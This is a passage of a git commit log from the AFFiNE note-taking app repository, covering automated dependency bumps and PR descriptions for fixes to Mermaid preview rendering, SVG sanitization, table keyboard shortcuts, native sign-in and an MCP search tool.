([2d5dfc8](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2d5dfc87a79567d6c65713279d9e169f791edd15))
- **groupssettings:** update the API
([81f7c45](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/81f7c4560d45065ccd96c24d05094c7b5de59580))
- **healthcare:** update the API
([4dcb153](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4dcb1532b818deed3e14b43d2e42de87d68a71ab))
- **homegraph:** update the API
([709f585](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/709f58538c74d97ac0508b3d5fd6518502401614))
- **iamcredentials:** update the API
([0610412](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/06104128540bdc9565a0cd8cdb812aafe4025ba2))
- **identitytoolkit:** update the API
([99534fb](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/99534fba8b394219448155ab565154cfa5710b15))
- **ids:** update the API
([5ad0d0b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5ad0d0ba7b827d5b24e69baa8ec6fb6aff738d2f))
- **indexing:** update the API
([3c4e15a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3c4e15a098c8cfaa8ac116046553bac0ca1cd7cb))
- **jobs:** update the API
([7687e7b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7687e7b88acbf1c0803bb9490593839728e013e5))
- **kgsearch:** update the API
([5a54be2](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5a54be26f5328c9a0b167cc06e4026358e1970df))
- **kmsinventory:** update the API
([3ac181b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3ac181bbd6283099b1ea29b1371c61eb0e211773))
- **language:** update the API
([91caf34](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/91caf3471150689b54fa2a51cde93de44c595df7))
- **libraryagent:** update the API
([50b72ef](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/50b72ef609e5c9058b5a03ed5aaa1b5062e4bf47))
- **licensing:** update the API
([b6f27e9](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b6f27e942a89e4597e1c212a700b26f51ddb7bf9))
- **lifesciences:** update the API
([fcc9aae](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/fcc9aaec76f6e1075e520b75118a9ca77a596dfb))
- **localservices:** update the API
([ca0c8d7](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ca0c8d7c7409cccbdf436d539119f093d3f62eec))
- **looker:** update the API
([0c067fa](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0c067fa5944b446b3b6766b57aec7ab646f08ba1))
- **managedidentities:** update the API
([1f430c5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/1f430c5ffd6aa522f4d99978a3a719918295a231))
- **manufacturers:** update the API
([d55ac4f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d55ac4f151d006e4d975eede60e491877a706a93))
- **memcache:** update the API
([39c011c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/39c011c3681af3e906b370080a2ca8a6caf83fa0))
- **ml:** update the API
([bf42196](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/bf421969326b70fae5d4c6cddc432546004ec0f0))
- **mybusinessaccountmanagement:** update the API
([ce386e4](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ce386e47e08737a2252203bc30d39229d9be595a))
- **mybusinessbusinessinformation:** update the API
([cdaeb3b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/cdaeb3bc7d8a80dfee13dd0de6dbc5a6f93f5c7c))
- **mybusinesslodging:** update the API
([34eda38](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/34eda38c76099f2aa6b906505fb7f2b33c43cf26))
- **mybusinessnotifications:** update the API
([ae38037](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ae38037c11139e45813fd0306e3357129b036e1d))
- **mybusinessplaceactions:** update the API
([c9f5ea0](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c9f5ea0ebe9ee56b0c600367122f2f833fc82d33))
- **mybusinessqanda:** update the API
([9d43c1e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9d43c1e6ee4654d8bfff86aa44eee91c212e2aef))
- **mybusinessverifications:** update the API
([60bdbd2](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/60bdbd229b5a25345953be1eff11813b10840902))
- **networksecurity:** update the API
([b4ab725](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b4ab7254926c2a80445481f490eb9738a7399f93))
- **networkservices:** update the API
([0cf9456](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0cf9456b33165b03510406f5173f875aa67b15c8))
- **notebooks:** update the API
([71b9980](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/71b99805f4a3b99585c09a1b5442e2e43be45d13))
- **oauth2:** update the API
([db72d5d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/db72d5d788e26b83dac6603dd0c66280e48643fe))
- **osconfig:** update the API
([fc51160](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/fc5116090ac8e177af2cfe17ed5bb938d1f27470))
- **oslogin:** update the API
([d814cb9](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d814cb920dcb533086161c1e8cba819aa36b7c6d))
- **pagespeedonline:** update the API
([ea4b6e3](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ea4b6e327902369d129eab3b4433509d3e488c36))
- **people:** update the API
([d2f704e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d2f704e98cef30bc42636f7aa866bd0a2b586f20))
- **places:** update the API
([7dd5993](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7dd5993f4d5adbfd6eeed73bad1c066594fa8ffe))
- **playcustomapp:** update the API
([301c3ad](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/301c3adda469b043a7d0c632fb6b41f06c918a78))
- **playdeveloperreporting:** update the API
([7e73906](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7e7390622559837e06f16e7303d286eedf2a58ed))
- **playgrouping:** update the API
([9753005](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9753005a61f6aeaab0e433f2691b635508721923))
- **playintegrity:** update the API
([78dfca2](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/78dfca25343031a78ba17ce5a9f84b4b449ff3c3))
- **policyanalyzer:** update the API
([703ab7b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/703ab7bcbcd642386a483f5a70056a41b73f40ce))
- **policysimulator:** update the API
([4a7be29](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4a7be29e56b02985916e9a5e0563f4c447980134))
- **policytroubleshooter:** update the API
([a556194](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a556194c602dd8f577f043908a7647667c6ac3f4))
- **poly:** update the API
([12d5e41](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/12d5e413c9db34fc5c1c34ab4773499c5f8c9c3b))
- **prod\_tt\_sasportal:** update the API
([5dfac38](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5dfac38e84b1d21146a9fecd9ead4a04d81e19f8))
- **publicca:** update the API
([e7906c5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e7906c5b474e2303a50a91dd15b3c0ca37ffbff8))
- **pubsublite:** update the API
([f06ab43](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f06ab430e6095263623df08ac0ff727c9ec9c332))
- **rapidmigrationassessment:** update the API
([3fe4f53](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3fe4f53ee08c594ac96fbe126918d555910d962a))
- **readerrevenuesubscriptionlinking:** update the API
([c2996fa](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c2996fac1a3f5c48fa0a0be9fa2b8b070f0e0a66))
- **realtimebidding:** update the API
([e05daef](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e05daefcd22ec574a00043ba5dbc13e7097b9970))
- **recommendationengine:** update the API
([7b4553c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7b4553c671f92881f12ca6b0c6d13b9897cff259))
- **recommender:** update the API
([827d7fc](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/827d7fcf0b01ee4bb097d0e9b258dacfd903d4de))
- **reseller:** update the API
([3b0d62c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3b0d62ce52be031269cc38d461464fde58015af4))
- **resourcesettings:** update the API
([b499612](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b49961200508406ed5dc860b66d671a1598026b0))
- **runtimeconfig:** update the API
([f4f60c4](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f4f60c410d6d7a39d585a3f9711bd1e398cf1d42))
- **safebrowsing:** update the API
([ec3ca1a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ec3ca1abec9b9a90efafba0840ad34bcaf28a24c))
- **sasportal:** update the API
([a6a96bc](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a6a96bc8ee62e20c1dd078e8074b07ea523a58fd))
- **script:** update the API
([582352f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/582352f283013f76babffc3f34de45aff10fb44e))
- **searchconsole:** update the API
([25ad1ff](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/25ad1ff213231bf47f909b48349a356b14d5dac6))
- **secretmanager:** update the API
([0d6d936](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0d6d93683ed834ad4414635c8408d1cbacda2c54))
- **servicedirectory:** update the API
([a550687](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a55068740ecafc29a193fe17a0d207e9becfdcac))
- **servicemanagement:** update the API
([74cb0a2](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/74cb0a2a62c6b29337808ad6fef57daf5c5afed5))
- **siteVerification:** update the API
([a0d8969](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a0d896969a6635f013a428cc58519075e58f7cfc))
- **slides:** update the API
([3e4be4b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3e4be4b9af47252b6b59de71255b08b2643f63df))
- **smartdevicemanagement:** update the API
([6ec4bd9](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6ec4bd90d316f93cd12000ae76feb395c327100e))
- **solar:** update the API
([4377037](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4377037197348f7908f9c0a5937d2acd938ba2e5))
- **sourcerepo:** update the API
([0889507](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/088950701aeffc7aa8e6f2f17f955023e05494e1))
- **speech:** update the API
([504c8d0](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/504c8d07f3a9363908cdee44b31294d97087956d))
- **storagetransfer:** update the API
([aee9c44](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/aee9c449cf7b6592a91674d8acf83c3f24089b87))
- **storage:** update the API
([cd03772](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/cd037720cda614720bef7852812b1eb99d86d25f))
- **streetviewpublish:** update the API
([3a0401c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3a0401c216fd3c4bc8c11913572cf4f628df4813))
- **sts:** update the API
([bce176a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/bce176a17c9e5ff821d2e6a058720f9f744e18b4))
- **tagmanager:** update the API
([594c354](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/594c354031bb89976ac2b46054c2e0cf6bcd3ed0))
- **tasks:** update the API
([4203139](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4203139d06bd3b8487d1d0e2d29b92ba7d9a6975))
- **testing:** update the API
([5d373cc](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5d373cc08c089156b7ca26d52fd51c059e5c1227))
- **texttospeech:** update the API
([366a3fc](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/366a3fc5e1e88c28e0500dbd72970b52bfa442e0))
- **toolresults:** update the API
([ad28679](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ad28679c983fdc6df90a2cfa73175f7d6f41c741))
- **transcoder:** update the API
([1799ca0](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/1799ca0e2b6c03a21e2dfecfcdd20efaf866222f))
- **translate:** update the API
([6ef599c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6ef599c831d7a797b797faf3736ac6514d6bf5c0))
- **travelimpactmodel:** update the API
([be498cd](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/be498cde964258f31edd0d32e5032555b4bf0211))
- **vault:** update the API
([cb9bc44](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/cb9bc4432053217aa68d18b283d55a4ca553617f))
- **versionhistory:** update the API
([0e4d78e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0e4d78e3b4fdd766a38662bd270453080efd804d))
- **videointelligence:** update the API
([8139c6a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8139c6a6a353c42b878ba2c5751071ecaa06eff0))
- **vision:** update the API
([c6585c7](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c6585c79b039060193405d68e865552f579dae19))
- **vmmigration:** update the API
([2664ee2](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2664ee2f9c1f01d51d8545f4cab82535fac59846))
- **vmwareengine:** update the API
([fcdd0d9](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/fcdd0d9cc42e7e7b34ec2b431f94043cde95b8e3))
- **vpcaccess:** update the API
([fe1b7f5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/fe1b7f52025c36cd63df1b874d1303ab8e13abab))
- **walletobjects:** update the API
([58fe19c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/58fe19cf6606af287f80afa88f6846a0df9a23c6))
- **webfonts:** update the API
([bd5115d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/bd5115dbc9c1bdb337f078cfac36bbc5143e41de))
- **webrisk:** update the API
([e227c8e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e227c8ed85845dfaf4aa51b0dd727d53a1a5f9cc))
- **websecurityscanner:** update the API
([3e1d63b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3e1d63b7ab93ca294ec0c983851321bc2fb85338))
- **workflowexecutions:** update the API
([3329041](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3329041d025edb6a14756e9f15324f6265e7a1e2))
- **workflows:** update the API
([b75aa48](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b75aa48a774260202f951f0b0b45255c8b346d69))
- **workspaceevents:** update the API
([78acf6b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/78acf6bdcb0197c34bc4f7950ed4bf351d386b59))
- **youtubeAnalytics:** update the API
([5fdf519](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5fdf519aebe3d4dfaa7fd477d1121dbc9bd1280f))
- **youtubereporting:** update the API
([87c5dcc](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/87c5dcc04c98a5defa4a271125cd5a248eca800a))

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-06-03 16:41:39 +08:00
renovate[bot] f98688f6c7 chore: bump up oxlint to v1.68.0 (#15071)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [oxlint](https://oxc.rs/docs/guide/usage/linter) ([source](https://redirect.github.com/oxc-project/oxc/tree/HEAD/npm/oxlint)) | [`1.67.0` → `1.68.0`](https://renovatebot.com/diffs/npm/oxlint/1.67.0/1.68.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/oxlint/1.68.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/oxlint/1.67.0/1.68.0?slim=true) |

---

### Release Notes

<details>
<summary>oxc-project/oxc (oxlint)</summary>

### [`v1.68.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1680---2026-06-01)

[Compare Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.67.0...oxlint_v1.68.0)

##### 🚀 Features

- [`e4b1f46`](https://redirect.github.com/oxc-project/oxc/commit/e4b1f46) linter/typescript: Implement `method-signature-style` rule ([#22679](https://redirect.github.com/oxc-project/oxc/issues/22679)) (Mikhail Baev)
- [`bc462ca`](https://redirect.github.com/oxc-project/oxc/commit/bc462ca) linter/vue: Implement no-reserved-component-names rule ([#22741](https://redirect.github.com/oxc-project/oxc/issues/22741)) (bab)
- [`ef9e751`](https://redirect.github.com/oxc-project/oxc/commit/ef9e751) linter/vue: Implement component-definition-name-casing rule ([#22818](https://redirect.github.com/oxc-project/oxc/issues/22818)) (bab)
- [`d67f51a`](https://redirect.github.com/oxc-project/oxc/commit/d67f51a) linter/vue: Implement require-prop-type-constructor rule ([#22708](https://redirect.github.com/oxc-project/oxc/issues/22708)) (bab)
- [`8422e8b`](https://redirect.github.com/oxc-project/oxc/commit/8422e8b) linter/jsdoc: Implement `require-yields-description` rule ([#22805](https://redirect.github.com/oxc-project/oxc/issues/22805)) (Mikhail Baev)
- [`fe93f97`](https://redirect.github.com/oxc-project/oxc/commit/fe93f97) linter/eslint: Implement `prefer-named-capture-group` rule ([#22759](https://redirect.github.com/oxc-project/oxc/issues/22759)) (Sebastian Poxhofer)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-06-03 16:21:02 +08:00
Ahsan Khaleeq 37ffef76a4 fix(core): restore Mermaid preview labels and theme-aware contrast (#15073)
fix #14979 
[Bug]: mermaid transparent text in light theme

## Summary

Mermaid diagram preview in code blocks showed shapes and connectors but
no node or edge labels, with poor contrast in dark mode. This change
fixes rendering, sanitization, and display so labels are visible in both
light and dark themes.

## Root cause

1. **Mermaid 11 config** — `flowchart.htmlLabels: false` is ignored;
only root-level `htmlLabels` applies. Labels were still emitted in
`<foreignObject>`.
2. **SVG sanitization** — `sanitizeSvg()` removed all `foreignObject`
elements (and did not allow `<use>`), stripping most label content.
3. **Theme mismatch** — Preview always used Mermaid’s light `default`
theme while the preview panel follows AFFiNE light/dark, causing dark
text on dark backgrounds for edge and title text.
4. **Embedded CSS** — Mermaid’s inline SVG styles often do not apply
after sanitization, leaving text without a visible `fill`.

## Changes

### Classic renderer (`classic-mermaid.ts`)

- Set root-level `htmlLabels: false` (Mermaid 11+).
- Map `dark` theme to Mermaid’s built-in `dark` palette.

### Sanitization (`bridge.ts`)

- Allow `<use>` and `xlink:href` / `href` for label references.
- Allow `class`, `style`, and `id` on SVG nodes.
- **Sanitize** `foreignObject` inner HTML with DOMPurify instead of
deleting it.

### Preview UI (`mermaid-preview.ts`)

- Sync render theme with app `data-theme` (`default` / `dark`) and
re-render on theme change.
- Add CSS overrides so `text` / `tspan` and HTML inside `foreignObject`
use AFFiNE `text/primary`.

### Native / mobile (`preview.rs`)

- Map `dark` and `modern` themes to the modern renderer options (light
uses `default`).

### Types & tests

- Extend `MermaidRenderTheme` with `'dark'`.
- Update unit tests for sanitization and classic config.
- Add integration test (skips when the test environment cannot lay out
Mermaid).

## Test plan

- [ ] Hard refresh or restart `yarn dev`.
- [ ] Create a `mermaid` code block: `graph TD; A-->B` → enable
**Preview**.
- [ ] Confirm labels **A** and **B** appear inside nodes and on the
edge.
- [ ] Toggle AFFiNE **light** / **dark** theme; confirm preview updates
and text stays readable.
- [ ] Run unit tests:
  ```bash
  yarn vitest run packages/frontend/core/src/modules/code-block-preview-renderer/
  ```
- [ ] (Optional) With **Enable Native Mermaid Renderer** enabled in
experimental settings, repeat the manual check.

## Notes for reviewers

- Security: `foreignObject` content is sanitized with the HTML profile;
scripts are stripped.
- The integration test intentionally skips when Mermaid produces an
empty diagram (e.g. happy-dom without full browser layout).


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Mermaid diagrams now adapt to the app's dark or light theme and update
in real time.

* **Improvements**
* SVG sanitization now preserves diagram labels and foreignObject text
while removing unsafe content.
* Classic Mermaid rendering adjusted to keep text labels intact for
previews.

* **Tests**
* Added unit and integration tests covering Mermaid rendering and SVG
sanitization.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-03 16:20:34 +08:00
DarkSky 81760fd45c chore: cleanup legacy logic (#15072) 2026-06-03 16:20:15 +08:00
renovate[bot] 8c0e1ba04e chore: bump up linter to v1.68.0 (#15069)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [eslint-plugin-oxlint](https://redirect.github.com/oxc-project/eslint-plugin-oxlint) | [`1.67.0` → `1.68.0`](https://renovatebot.com/diffs/npm/eslint-plugin-oxlint/1.67.0/1.68.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/eslint-plugin-oxlint/1.68.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/eslint-plugin-oxlint/1.67.0/1.68.0?slim=true) |

---

### Release Notes

<details>
<summary>oxc-project/eslint-plugin-oxlint (eslint-plugin-oxlint)</summary>

### [`v1.68.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.68.0)

[Compare Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.67.0...v1.68.0)

*No significant changes*

##### [View changes on GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.67.0...v1.68.0)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-06-03 02:40:13 +08:00
DarkSky aca47445aa feat(client): migration old package to rspack (#15068)
#### PR Dependency Tree


* **PR #15068** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
* Upgraded Vitest across packages to 4.1.8 and bumped Tailwind PostCSS
to 4.3.0
* CLI/tooling updated to support the media-capture-playground package
and adjust build/dev server behavior

* **Bug Fixes**
  * Improved workspace deletion reliability in the Electron app

* **Refactor**
* Simplified media capture playground build setup (build/config
adjustments)

* **Tests**
* Made tests more robust by preserving/restoring environment state
during runs
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-02 12:00:50 +08:00
Jessy Latmi 69c2f09eba fix(editor): keyboard shortcuts in table cells (#15067)
## Description
Fixes keyboard shortcuts for text formatting (Ctrl+B, Ctrl+I, Ctrl+U,
etc.) not working inside table cells.
## Changes
- **Modified `table-cell.ts`**: Updated the `_handleKeyDown` method to
only prevent default behavior for Tab key and allow other keyboard
events to propagate, enabling text formatting shortcuts to work properly
- **Created `table-keymap.ts`**: New module that registers the
`textKeymap` for table blocks, ensuring text formatting shortcuts are
available in table cells
- **Updated `view.ts`**: Registered the `TableKeymapExtension` in the
table view extension setup
- **Cleaned up `format.ts`**: Removed unnecessary `TextSelection` check
that was preventing shortcuts from working in table contexts
## Closes
Closes #13916 #12127

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Improved Tab key handling within table cells for more consistent
keyboard navigation.
* Simplified read-only detection for keyboard shortcuts to avoid
unexpected behavior.

* **Refactor**
* Reworked table keyboard mapping and registration to streamline
shortcut handling and event flow.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-02 10:52:05 +08:00
Ahsan Khaleeq 75f4c0eede feat(editor): add block button for hovering blocks (#14879)
This PR implements [feature request] #14845 

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Add-block control that appears when hovering blocks in page mode to
insert and auto-focus a new paragraph; control hides after insertion.

* **Improvements**
* Improved hover and interaction handling to avoid accidental triggers
when interacting with the drag handle or add-block control.
* Consistent sizing, positioning, and visibility behavior for the
add-block control.

* **Style**
  * Moved heading icon slightly for improved visual alignment.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
2026-06-02 01:16:17 +08:00
DarkSky 38110de134 fix(core): desktop e2e (#15062)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Sign-in flows now reliably propagate richer authentication results
(user data and session type), improving persistence and reducing
intermittent sign-in issues.
* Native token handling gains a fallback for environments without
encrypted storage, improving session reliability.

* **New Features**
* User-visible warning when sign-in is session-only because encrypted
storage is unavailable.

* **Chores**
  * Tooling ignore patterns updated to exclude .codex.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-01 23:54:41 +08:00
DarkSky 7123595831 chore: bump deps (#15059)
#### PR Dependency Tree


* **PR #15059** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Configurable minimum account age before new accounts can invite
members or create share links (default: 24 hours).
* Sign-in now returns and caches user info for improved session
handling.

* **Bug Fixes**
  * Queue handling accepts and resolves job IDs with special characters.
* Improved clipboard/rich-text caret handling and nested-list paste
reliability.
  * Calendar tests use dynamic current-month dates.
  * AI search returns explicit "No matching documents" when none found.
  * Auth session responses are explicitly non-cacheable.

* **Chores**
* Dependency and toolchain bumps; admin UI config/schema exposes the new
account-age setting.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-01 20:13:59 +08:00
Marsssssssssssdsss 78cf402141 fix: handle empty results in MCP keyword_search tool (#15058)
## Description

Fixes: #15038 — MCP keyword_search tool errors with "Unexpected response
type" when no results are found.

### Problem

When the MCP `keyword_search` tool returns no matching documents, the
access control `.docs()` method may return `undefined`/`null` for an
empty input array. Calling `.map()` on this value throws an error, and
the MCP framework wraps it as "Unexpected response type".

### Solution

Added a guard check after the permission filtering step. If the result
is empty or null, the tool now returns a proper informational response
instead of throwing.

### Changes

- `packages/backend/server/src/plugins/copilot/mcp/provider.ts`: Added
null/empty check before `docs.map()` in the keyword_search tool execute
function.

### Testing

- **Before**: `keyword_search` with a non-existent keyword throws
"Unexpected response type"
- **After**: `keyword_search` with a non-existent keyword returns `{
content: [{ type: 'text', text: 'No matching documents found.' }] }`


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
  * Prevented errors when document data is missing, improving search stability.
  * Improved search feedback by displaying a clear "No matching documents found." message instead of empty results.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-01 17:56:42 +08:00
DarkSky ebd3e62ed9 fix(server): canary may missing changelog (#15061)
fix #15027 


#### PR Dependency Tree


* **PR #15061** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
  * Improved handling of missing release notes during upgrade checks. The changelog field now defaults to an empty value when release information is unavailable.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-01 17:11:35 +08:00
DarkSky ce9841df9d feat(server): passkey pre-refactor (#15060)
#### PR Dependency Tree


* **PR #15060** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
  * OpenApp native sign-in and native session exchange (JWT) for mobile & desktop.
  * Centralized short-lived auth challenge store for one-time tokens.
  * Encrypted per-endpoint token storage and native token handlers (Android, iOS, Electron).

* **Improvements**
  * Richer auth-method reporting (password, magic link, OAuth, passkey) and improved sign-in flows.
  * Hardened magic-link, OAuth, and session issuance; JWT-backed sessions and websocket JWT support.
  * UX tweaks: form-based password submit, OTP autocomplete, adjusted captcha flow.

* **Bug Fixes**
  * Expanded tests and auth-state resets to avoid cross-test leakage.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-06-01 17:11:15 +08:00
renovate[bot] 5b9d51b41b chore: bump up RevenueCat/purchases-ios-spm version to from: "5.75.0" (#15048)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
|
[RevenueCat/purchases-ios-spm](https://redirect.github.com/RevenueCat/purchases-ios-spm)
